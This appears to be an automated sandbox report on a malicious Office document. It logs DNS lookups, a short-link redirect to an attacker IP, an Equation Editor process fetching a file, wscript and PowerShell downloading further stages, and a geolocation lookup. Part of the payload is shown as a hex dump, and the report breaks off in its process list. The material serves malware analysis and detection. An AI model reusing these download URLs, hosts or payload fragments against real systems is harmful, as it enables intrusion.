Aug 28, 2024 22:29:22.077455044 CEST | 192.168.2.22 | 8.8.8.8 | 0x390f | Standard query (0) | zhort.de | A (IP address) | IN (0x0001) | false
Aug 28, 2024 22:29:26.544265032 CEST | 192.168.2.22 | 8.8.8.8 | 0x1100 | Standard query (0) | zhort.de | A (IP address) | IN (0x0001) | false
Aug 28, 2024 22:29:26.553512096 CEST | 192.168.2.22 | 8.8.8.8 | 0x2664 | Standard query (0) | zhort.de | A (IP address) | IN (0x0001) | false
Aug 28, 2024 22:29:28.053601027 CEST | 192.168.2.22 | 8.8.8.8 | 0xb6ec | Standard query (0) | zhort.de | A (IP address) | IN (0x0001) | false
Aug 28, 2024 22:29:28.078092098 CEST | 192.168.2.22 | 8.8.8.8 | 0xd97e | Standard query (0) | zhort.de | A (IP address) | IN (0x0001) | false
Aug 28, 2024 22:29:36.650301933 CEST | 192.168.2.22 | 8.8.8.8 | 0x5cd | Standard query (0) | ia803104.us.archive.org | A (IP address) | IN (0x0001) | false
Aug 28, 2024 22:29:42.015204906 CEST | 192.168.2.22 | 8.8.8.8 | 0x1fb8 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 28, 2024 22:29:18.752123117 CEST | 8.8.8.8 | 192.168.2.22 | 0x90ed | No error (0) | zhort.de | | 88.99.66.38 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 22:29:20.806260109 CEST | 8.8.8.8 | 192.168.2.22 | 0x48fd | No error (0) | zhort.de | | 88.99.66.38 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 22:29:22.075385094 CEST | 8.8.8.8 | 192.168.2.22 | 0x6660 | No error (0) | zhort.de | | 88.99.66.38 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 22:29:22.100014925 CEST | 8.8.8.8 | 192.168.2.22 | 0x390f | No error (0) | zhort.de | | 88.99.66.38 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 22:29:26.552303076 CEST | 8.8.8.8 | 192.168.2.22 | 0x1100 | No error (0) | zhort.de | | 88.99.66.38 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 22:29:26.560399055 CEST | 8.8.8.8 | 192.168.2.22 | 0x2664 | No error (0) | zhort.de | | 88.99.66.38 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 22:29:28.075498104 CEST | 8.8.8.8 | 192.168.2.22 | 0xb6ec | No error (0) | zhort.de | | 88.99.66.38 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 22:29:28.084939957 CEST | 8.8.8.8 | 192.168.2.22 | 0xd97e | No error (0) | zhort.de | | 88.99.66.38 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 22:29:36.661819935 CEST | 8.8.8.8 | 192.168.2.22 | 0x5cd | No error (0) | ia803104.us.archive.org | | 207.241.232.154 | A (IP address) | IN (0x0001) | false
Aug 28, 2024 22:29:42.024507046 CEST | 8.8.8.8 | 192.168.2.22 | 0x1fb8 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                                                              • zhort.de
                                                                              • ia803104.us.archive.org
                                                                              • 198.12.81.228
                                                                              • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49162 | 198.12.81.228 | 80 | 3604 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data

Aug 28, 2024 22:29:19.730010986 CEST | 468 | OUT
GET /600/gv/sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith.doc HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 198.12.81.228
Connection: Keep-Alive

Aug 28, 2024 22:29:20.225430012 CEST | 1236 | IN
HTTP/1.1 200 OK
Date: Wed, 28 Aug 2024 20:29:20 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
Last-Modified: Wed, 28 Aug 2024 10:41:36 GMT
ETag: "17542-620bc0099129b"
Accept-Ranges: bytes
Content-Length: 95554
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/msword


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49169 | 198.12.81.228 | 80 | 3816 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | Bytes transferred | Direction | Data
Aug 28, 2024 22:29:31.077141047 CEST | 281 | OUT | HEAD /600/gv/sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith.doc HTTP/1.1
User-Agent: Microsoft Office Existence Discovery
Host: 198.12.81.228
Content-Length: 0
Connection: Keep-Alive
Aug 28, 2024 22:29:31.777801037 CEST | 322 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Aug 2024 20:29:31 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
Last-Modified: Wed, 28 Aug 2024 10:41:36 GMT
ETag: "17542-620bc0099129b"
Accept-Ranges: bytes
Content-Length: 95554
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/msword
Aug 28, 2024 22:29:31.778271914 CEST | 322 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Aug 2024 20:29:31 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
Last-Modified: Wed, 28 Aug 2024 10:41:36 GMT
ETag: "17542-620bc0099129b"
Accept-Ranges: bytes
Content-Length: 95554
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/msword


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49170 | 198.12.81.228 | 80 | 3096 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | Bytes transferred | Direction | Data
Aug 28, 2024 22:29:32.133135080 CEST | 345 | OUT | GET /600/creatednewimagesinpicturebuttersmooth.tIF HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 198.12.81.228
Connection: Keep-Alive
Aug 28, 2024 22:29:32.677210093 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Aug 2024 20:29:32 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
Last-Modified: Wed, 28 Aug 2024 10:39:05 GMT
ETag: "2caba-620bbf79601e3"
Accept-Ranges: bytes
Content-Length: 182970
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/tiff


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.22 | 49172 | 198.12.81.228 | 80 | 2900 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Aug 28, 2024 22:29:39.463447094 CEST | 75 | OUT | GET /600/RGGV.txt HTTP/1.1
Host: 198.12.81.228
Connection: Keep-Alive
Aug 28, 2024 22:29:39.932537079 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Wed, 28 Aug 2024 20:29:39 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
Last-Modified: Wed, 28 Aug 2024 10:36:24 GMT
ETag: "a1000-620bbee008703"
Accept-Ranges: bytes
Content-Length: 659456
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.22 | 49175 | 178.237.33.50 | 80 | 2496 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
Aug 28, 2024 22:29:42.035069942 CEST | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Aug 28, 2024 22:29:42.678433895 CEST | 1170 | IN | HTTP/1.1 200 OK
date: Wed, 28 Aug 2024 20:29:42 GMT
server: Apache
content-length: 962
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"0ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49161 | 88.99.66.38 | 443 | 3604 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | Bytes transferred | Direction | Data
2024-08-28 20:29:19 UTC | 321 | OUT | GET /UlEYs1 HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: zhort.de
Connection: Keep-Alive
2024-08-28 20:29:19 UTC | 581 | IN | HTTP/1.1 302 Found
Server: openresty
Date: Wed, 28 Aug 2024 20:29:19 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 191
Connection: close
X-DNS-Prefetch-Control: off
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Download-Options: noopen
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Location: http://198.12.81.228/600/gv/sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith.doc
Vary: Accept
X-Served-By: zhort.de
2024-08-28 20:29:19 UTC | 191 | IN | Data Ascii: Found. Redirecting to http://198.12.81.228/600/gv/sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith.doc


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.22 | 49163 | 88.99.66.38 | 443 | 3816 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | Bytes transferred | Direction | Data
2024-08-28 20:29:21 UTC | 130 | OUT | OPTIONS / HTTP/1.1
User-Agent: Microsoft Office Protocol Discovery
Host: zhort.de
Content-Length: 0
Connection: Keep-Alive
2024-08-28 20:29:21 UTC | 450 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Wed, 28 Aug 2024 20:29:21 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 8
Connection: close
X-DNS-Prefetch-Control: off
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Download-Options: noopen
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Allow: GET,HEAD
ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
X-Served-By: zhort.de
2024-08-28 20:29:21 UTC | 8 | IN | Data Raw: 47 45 54 2c 48 45 41 44
Data Ascii: GET,HEAD


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.22 | 49164 | 88.99.66.38 | 443 | 3816 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | Bytes transferred | Direction | Data
2024-08-28 20:29:22 UTC | 115 | OUT | HEAD /UlEYs1 HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft Office Existence Discovery
Host: zhort.de
2024-08-28 20:29:23 UTC | 593 | IN | HTTP/1.1 302 Found
Server: openresty
Date: Wed, 28 Aug 2024 20:29:22 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 191
Connection: close
X-DNS-Prefetch-Control: off
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Download-Options: noopen
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Location: http://198.12.81.228/600/gv/sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith.doc
Vary: Accept
X-Served-By: zhort.de


Session ID | Source IP | Source Port | Destination IP | Destination Port
3 | 192.168.2.22 | 49165 | 88.99.66.38 | 443
Timestamp | Bytes transferred | Direction | Data
2024-08-28 20:29:27 UTC | 125 | OUT | OPTIONS / HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
translate: f
Host: zhort.de
2024-08-28 20:29:27 UTC | 450 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Wed, 28 Aug 2024 20:29:27 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 8
Connection: close
X-DNS-Prefetch-Control: off
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Download-Options: noopen
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Allow: GET,HEAD
ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
X-Served-By: zhort.de
2024-08-28 20:29:27 UTC | 8 | IN | Data Raw: 47 45 54 2c 48 45 41 44
Data Ascii: GET,HEAD


Session ID | Source IP | Source Port | Destination IP | Destination Port
4 | 192.168.2.22 | 49166 | 88.99.66.38 | 443
Timestamp | Bytes transferred | Direction | Data
2024-08-28 20:29:28 UTC | 155 | OUT | PROPFIND / HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: zhort.de
2024-08-28 20:29:29 UTC | 423 | IN | HTTP/1.1 404 Not Found
Server: openresty
Date: Wed, 28 Aug 2024 20:29:28 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 144
Connection: close
X-DNS-Prefetch-Control: off
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Download-Options: noopen
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Security-Policy: default-src 'none'
2024-08-28 20:29:29 UTC | 144 | IN | Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
5 | 192.168.2.22 | 49167 | 88.99.66.38 | 443
Timestamp | Bytes transferred | Direction | Data
2024-08-28 20:29:29 UTC | 155 | OUT | PROPFIND / HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: zhort.de
2024-08-28 20:29:29 UTC | 423 | IN | HTTP/1.1 404 Not Found
Server: openresty
Date: Wed, 28 Aug 2024 20:29:29 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 144
Connection: close
X-DNS-Prefetch-Control: off
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Download-Options: noopen
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Security-Policy: default-src 'none'
2024-08-28 20:29:29 UTC | 144 | IN | Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.22 | 49168 | 88.99.66.38 | 443 | 3816 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Timestamp | Bytes transferred | Direction | Data
2024-08-28 20:29:30 UTC | 134 | OUT | HEAD /UlEYs1 HTTP/1.1
User-Agent: Microsoft Office Existence Discovery
Host: zhort.de
Content-Length: 0
Connection: Keep-Alive
2024-08-28 20:29:31 UTC | 593 | IN | HTTP/1.1 302 Found
Server: openresty
Date: Wed, 28 Aug 2024 20:29:30 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 191
Connection: close
X-DNS-Prefetch-Control: off
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Download-Options: noopen
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Location: http://198.12.81.228/600/gv/sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith.doc
Vary: Accept
X-Served-By: zhort.de


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.22 | 49171 | 207.241.232.154 | 443 | 2900 | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-28 20:29:37 UTC | 111 | OUT | GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1
Host: ia803104.us.archive.org
Connection: Keep-Alive
2024-08-28 20:29:37 UTC | 591 | IN | HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Wed, 28 Aug 2024 20:29:37 GMT
Content-Type: image/jpeg
Content-Length: 1931225
Last-Modified: Fri, 26 Jul 2024 21:52:52 GMT
Connection: close
ETag: "66a41ab4-1d77d9"
Strict-Transport-Security: max-age=15724800
Expires: Thu, 29 Aug 2024 02:29:37 GMT
Cache-Control: max-age=21600
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
Access-Control-Allow-Credentials: true
Accept-Ranges: bytes
                                                                              2024-08-28 20:29:38 UTC16384INData Raw: 8b 3d 6c 75 ca bc 9b a3 2a dd fa 71 db 28 20 6b 1b 9a d7 b5 60 32 91 16 76 51 b4 13 c2 8a eb 81 24 28 0a 0f e2 a3 5e fc e5 cb 32 15 60 f4 cb 8b 44 18 b0 bf 87 5f 9e 03 29 50 c6 ad ba c0 52 48 3f 3c be e1 aa 5d d5 b4 fb 60 a2 47 a2 4a d8 ae 8d c7 7c 22 c8 aa 28 0a 6f 81 c0 b1 57 24 10 d4 47 53 87 57 91 88 3c 16 e9 f1 ca c1 44 96 91 7d 23 93 c6 04 38 7b 02 c0 dc 5b 03 b5 6b 24 8f c8 2a 40 af 4a 91 78 ba 3c a9 48 59 b6 f4 17 d1 72 da 90 59 82 bb 8a ab 06 b2 fa 04 3f 79 8e a3 0c 03 03 fa e0 34 08 89 01 12 2b 33 75 bc 21 77 48 c8 2c a4 13 5e ac d5 83 cc 9a 59 42 ac 4d e6 44 19 c0 61 e8 3e ae 38 e6 fe 58 4d 52 99 fc 3c e9 d4 ed 2a b7 f8 89 ba 20 fe 74 0e 07 9e 96 14 f3 55 22 94 c8 59 80 65 b0 36 f4 c9 d4 ab e9 da 45 56 14 a6 95 94 7c 7a 7f 2c 79 3c 3d 9d 16 5d
                                                                              Data Ascii: =lu*q( k`2vQ$(^2`D_)PRH?<]`GJ|"(oW$GSW<D}#8{[k$*@Jx<HYrY?y4+3u!wH,^YBMDa>8XMR<* tU"Ye6EV|z,y<=]
                                                                              2024-08-28 20:29:38 UTC16384INData Raw: 2d 4a 56 e8 73 fc c6 65 1d 36 a9 a8 b4 32 d5 75 2a 70 b1 47 3a a3 20 d3 cb 4c 45 1d 97 5f a6 07 a3 9b 5a 9f 7a 84 c7 a6 02 37 45 90 33 b7 3c a8 f6 f9 e4 6a 66 79 19 a5 90 d0 03 90 00 20 01 81 82 37 5f 28 36 9b 51 21 1b 55 58 23 70 4a a8 e9 f9 e0 b5 d0 eb 1e 53 a7 5d 24 e5 14 06 94 aa 9b db 63 b6 04 69 99 35 13 2e a7 63 80 a4 aa 5f 17 c7 5c 63 c4 66 6d 1e 81 a4 85 dd 0b cc a5 97 cc 62 39 0c 7e 9d 4e 5b 4b 1c f3 32 a4 3a 69 4c 61 7d 2d e5 92 00 ec 3e 78 f4 f0 6a 53 c3 a7 12 68 e7 7d ae 80 a9 8c 83 c2 b5 9a ae 70 32 f4 1a 99 1c c9 01 05 98 b1 75 05 89 0c 09 ec 6e bf 3c 7a 3d 76 ad 19 55 f4 c6 23 b8 ab 30 91 78 5a e9 c1 cc a8 23 99 b5 60 e9 74 1a 99 02 16 2d 4a 40 ab e3 68 ed 9a 69 0e b9 d9 07 dc a6 48 d8 ee 2a c8 d7 7d b9 aa eb 58 0d e9 e4 4d 4f 88 c6 f2 28
                                                                              Data Ascii: -JVse62u*pG: LE_Zz7E3<jfy 7_(6Q!UX#pJS]$ci5.c_\cfmb9~N[K2:iLa}->xjSh}p2un<z=vU#0xZ#`t-J@hiH*}XMO(
                                                                              2024-08-28 20:29:38 UTC16384INData Raw: 18 01 03 9c 90 0f bf 6c b9 8e 94 b0 3c 55 fd 2e b2 de 58 0d b7 b8 6d a4 60 54 48 c0 83 67 82 0f 5e f9 01 ab a0 00 f4 04 75 c9 d8 0d 1b e0 93 fa 64 98 c9 23 6d 74 bb 26 b8 fa e0 54 b5 8e 7e 1c fc 32 18 b3 12 4f 5b cb f9 2c 5c a8 f5 10 2f d3 cf f2 c8 75 28 05 d8 24 5d 1f 9e 00 fe 99 c3 83 91 59 20 73 cf 4c 0b 33 16 1c b1 35 d2 fd b2 bd 0e 47 7c be df 48 3e fd 30 2e 93 15 52 0f 26 b8 bc d6 d0 ea 36 78 26 a6 32 dc b3 3d 7b 9b 51 98 80 73 9b da 5d 31 8f c2 64 2e ca 5a 51 e9 e3 91 b9 40 1f cf 03 08 83 66 fa fc f0 91 32 a9 16 47 5e f8 c7 fb 3a 63 e5 01 b4 17 2c 28 9f c2 57 ad e7 1d 0c 8a 81 88 52 4a ef 23 9f c3 ef d2 b0 28 fa 97 3b 68 f0 16 be 7c e0 0b b7 62 40 cd 3f f6 5f 96 17 cc 7b 25 c2 0a e3 93 f1 fa e2 b2 69 4a 5f ac 1b 24 55 f3 c7 bd 60 00 4c 7c b2 a4 93
                                                                              Data Ascii: l<U.Xm`THg^ud#mt&T~2O[,\/u($]Y sL35G|H>0.R&6x&2={Qs]1d.ZQ@f2G^:c,(WRJ#(;h|b@?_{%iJ_$U`L|
                                                                              2024-08-28 20:29:38 UTC16384INData Raw: b1 5f 33 d1 61 7e 27 ae 71 65 1c 85 60 4f 5b 6b fe 99 c5 3d 36 bc e7 20 05 1e fa ed e3 f3 18 16 03 cc 56 35 c2 8b eb 94 11 bb 29 2a 09 03 db 2a 2d 6c 13 5e e3 0a 26 db 13 22 9a dc 6c e0 04 06 3d 2f 25 56 cd 75 3e d8 53 3f ee d5 02 28 2b d1 80 e4 e7 42 ae cc 4a ae ea 16 6b f2 c0 8f 2d fa 9e 3e 67 fa e5 41 60 76 92 7a 8e 87 0a 8e f0 4d b8 a6 ea 04 15 71 ee 2b 91 95 92 51 34 e1 c2 aa 5d 0a ed 80 c3 99 c5 4b 23 bf 50 48 36 2b 9f ed ed 93 1f 88 49 f8 4b b2 93 54 77 1c 9d 74 85 8a a9 bb 0b b4 7a b7 0e d4 6f e4 71 51 03 34 05 c7 63 58 1b ba 4f 10 91 34 72 15 91 9e 4d a1 68 b1 f7 ab 1f a6 35 ab d6 4b f7 69 5a 19 59 77 39 a0 77 5f 40 4f 73 c8 00 f3 55 9e 6a 09 8c 3b 88 e6 c5 57 6e 08 39 b3 0f 8a c3 a8 d3 b4 73 22 06 dc cc 5d ae e8 d0 a1 5c f2 2c 7d 70 18 07 57 ad
                                                                              Data Ascii: _3a~'qe`O[k=6 V5)**-l^&"l=/%Vu>S?(+BJk->gA`vzMq+Q4]K#PH6+IKTwtzoqQ4cXO4rMh5KiZYw9w_@OsUj;Wn9s"]\,}pW
                                                                              2024-08-28 20:29:38 UTC16384INData Raw: 47 b2 68 df 68 89 dd 18 31 e7 69 e8 73 22 79 c6 ae 09 64 50 54 a8 16 b7 67 93 5f d7 01 e2 91 bb 34 77 41 ba 8f 7c 6e 1d 12 41 a7 54 46 b5 26 d8 5d 58 cc e4 d3 38 86 4a 2d 6a a5 aa b9 e9 8f c0 e4 68 61 06 b7 6c 05 ad 79 e9 80 e4 3a d5 82 0a 2c cc aa 0a 84 02 c9 17 c1 fa 63 47 50 82 16 6d aa 48 ea 6e ae c7 71 98 da c1 10 d3 87 2c 48 50 58 02 d4 2c f0 3f 5c 2e a5 1c f8 7a f9 8c c9 24 71 d8 65 66 04 10 2f 9e 70 3b 57 af 82 02 db d2 46 90 11 c0 52 36 8f 70 7a 65 22 68 e5 1b fc d0 e8 bf 85 80 b2 3e bf 5c 8d 24 b3 b4 65 66 f2 d9 50 2b 33 51 e4 37 c4 e6 66 b3 53 16 96 79 74 ba 78 94 2a bd 6e 1c dd 7c f0 36 5e 78 a1 87 71 5d e7 f8 16 e8 93 81 2a e3 f1 9b 24 6e f4 f4 53 ed 78 a2 b1 9a 1d 36 a6 28 0a 48 f3 aa 31 56 bd dc 1e d9 ab a9 46 d3 c4 01 52 64 24 80 a4 f2 7a
                                                                              Data Ascii: Ghh1is"ydPTg_4wA|nATF&]X8J-jhaly:,cGPmHnq,HPX,?\.z$qef/p;WFR6pze"h>\$efP+3Q7fSytx*n|6^xq]*$nSx6(H1VFRd$z

                                                                              Target ID:0
                                                                              Start time:16:28:57
                                                                              Start date:28/08/2024
                                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                              Imagebase:0x13f0e0000
                                                                              File size:28'253'536 bytes
                                                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:3
                                                                              Start time:16:29:19
                                                                              Start date:28/08/2024
                                                                              Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                                                                              Imagebase:0x13f1c0000
                                                                              File size:1'423'704 bytes
                                                                              MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:8
                                                                              Start time:16:29:31
                                                                              Start date:28/08/2024
                                                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                              Imagebase:0x400000
                                                                              File size:543'304 bytes
                                                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:9
                                                                              Start time:16:29:32
                                                                              Start date:28/08/2024
                                                                              Path:C:\Windows\SysWOW64\wscript.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS"
                                                                              Imagebase:0x300000
                                                                              File size:141'824 bytes
                                                                              MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:10
                                                                              Start time:16:29:32
                                                                              Start date:28/08/2024
                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):true
